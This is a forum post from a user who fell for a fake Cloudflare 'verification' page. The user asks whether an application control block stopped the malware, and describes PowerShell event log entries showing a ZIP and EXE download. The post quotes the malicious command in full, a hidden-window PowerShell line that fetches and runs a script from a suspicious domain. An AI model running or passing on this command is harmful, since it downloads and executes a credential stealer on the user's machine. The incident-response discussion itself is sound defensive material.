
I fell for the CloudFlare Powershell command but am I ok?
Hi everyone,
I accidentally executed a malicious PowerShell command from a fake Cloudflare "verification" page earlier today. I know better, but I made a mistake. I disconnected the machine from the internet immediately and have been analyzing the logs to see if the malware executed.
I am hoping the infection was blocked by Windows security policy (WDAC/AppLocker) before it could actually run. I want a second opinion to be absolutely sure.
The Command: powershell -w h "iex(irm 'idverification-cdn.info/3ece245b0da134dc' -UseBasicParsing)"; exit
What I’ve found in Event Viewer (Microsoft-Windows-PowerShell/Operational):
- Event ID 4104 shows the script downloading a ZIP and an EXE.
- Event ID 4100 shows the attempt to run the unzipped file (Verification.exe).
- The log explicitly states: "Error Message = This command cannot be run due to the error: An Application Control policy has blocked this file."
My Questions:
- Given that this error triggered at the point of executing the Verification.exe payload, is it safe to assume the "stealer" logic never initialized?
- Looking at the script block logs (I’ve pasted the key parts below), do these scripts contain any "stealing" logic, or are they purely loaders/droppers?
- Is there any way the "dropper" could have exfiltrated data before the block, or do these scripts require the payload to run to perform the theft?